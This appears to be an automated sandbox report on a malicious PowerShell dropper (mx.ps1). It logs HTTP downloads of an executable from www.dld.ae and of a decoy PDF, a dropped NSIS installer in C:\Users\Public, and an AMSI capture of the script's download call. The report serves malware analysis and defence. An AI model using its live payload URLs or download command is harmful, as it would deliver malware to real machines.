Click to jump to signature section
Source: unknown | HTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.4:49694 version: TLS 1.0 |
Source: | Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr |
Source: | Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 2_2_0040595A |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_0040658F FindFirstFileW,FindClose, | 2_2_0040658F |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_00402862 FindFirstFileW, | 2_2_00402862 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad |
Source: global traffic | HTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.4:49694 version: TLS 1.0 |
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694 |
Source: powershell.exe, 00000000.00000002.675724672.000001CFC4EF5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: u5p3.bat, 00000002.00000000.584676802.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, u5p3.bat, 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, u5p3.bat.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 00000000.00000002.671927237.000001CFBD060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.671927237.000001CFBCF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.618817974.000001CFACEB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp, mx.ps1 | String found in binary or memory: http://www.bludgumaxxlasdgur.com/rh/List%20of%20rdguquirdgud%20itdgums%20and%20sdgurvicdgus.pdf |
Source: powershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFADFF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com |
Source: powershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf |
Source: powershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.comx |
Source: u5p3.bat, 00000002.00000003.595363835.000000000287C000.00000004.00000020.00020000.00000000.sdmp, bn.txt.2.dr | String found in binary or memory: http://www.oruddho.com |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAE98A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.675724672.000001CFC4F78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co |
Source: powershell.exe, 00000000.00000002.671927237.000001CFBD060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.671927237.000001CFBCF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD8B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dld.ae |
Source: powershell.exe, 00000000.00000002.618817974.000001CFAD8B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dld.ae/zp/zpeu.exe |
Source: unknown | DNS traffic detected: queries for: www.dld.ae |
Source: global traffic | HTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive |
Source: u5p3.bat, 00000002.00000002.840853027.000000000070A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> | |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, | 2_2_004053EF |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\u5p3.bat | Jump to dropped file |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, | 2_2_0040333D |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_00406956 | 2_2_00406956 |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_00404C2C | 2_2_00404C2C |
Source: C:\Users\Public\u5p3.bat | Process Stats: CPU usage > 98% |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mx.ps1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\u5p3.bat "C:\Users\Public\u5p3.bat" | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\u5p3.bat "C:\Users\Public\u5p3.bat" | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\Public\u5p3.bat | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 | Jump to behavior |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, | 2_2_0040333D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\u5p3.bat | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pn21suu.a4h.ps1 | Jump to behavior |
Source: classification engine | Classification label: mal56.evad.winPS1@13/64@3/3 |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_004020FE CoCreateInstance, | 2_2_004020FE |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, | 2_2_004046B0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll | Jump to behavior |
Source: | Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr |
Source: | Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: u5p3.bat, 00000002.00000003.595066561.0000000002870000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_10002DE0 push eax; ret | 2_2_10002E0E |
Source: C:\Users\Public\u5p3.bat | Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, | 2_2_10001B18 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\u5p3.bat | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\u5p3.bat | Jump to dropped file |
Source: C:\Users\Public\u5p3.bat | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll | Jump to dropped file |
Source: C:\Users\Public\u5p3.bat | File created: C:\Users\user\AppData\Local\Temp\nsn12E4.tmp\System.dll | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\u5p3.bat | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\u5p3.bat | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.bludgumaxxlasdgur.com/rh/List%20of%20rdguquirdgud%20itdgums%20and%20sdgurvicdgus.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packagi |